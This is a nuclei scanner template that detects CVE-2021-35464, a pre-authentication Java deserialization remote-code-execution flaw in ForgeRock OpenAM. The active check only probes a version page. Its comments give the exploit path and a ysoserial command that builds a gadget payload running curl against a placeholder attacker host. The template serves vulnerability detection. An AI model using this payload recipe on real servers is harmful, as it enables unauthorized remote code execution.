nuclei-templates/cves/2021/CVE-2021-35464.yaml

37 lines
989 B
YAML

id: CVE-2021-35464
info:
author: madrobot
name: Pre-auth RCE in ForgeRock OpenAM
description: ForgeRock OpenAM unsafe Java deserialization RCE.
severity: critical
tags: cve,cve2021,openam,rce,java
reference:
- https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464
requests:
- method: GET
path:
- '{{BaseURL}}/openam/oauth2/..;/ccversion/Version'
# '{{BaseURL}}/openam/oauth2/..;/ccversion/Version?jato.pageSession=<serialized_object>'
# java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Click1 "curl http://YOUR_HOST" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '='
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Set-Cookie: JSESSIONID="
part: header
- type: word
words:
- "Version Information -"
- "openam/ccversion/Masthead.jsp"
part: body
condition: or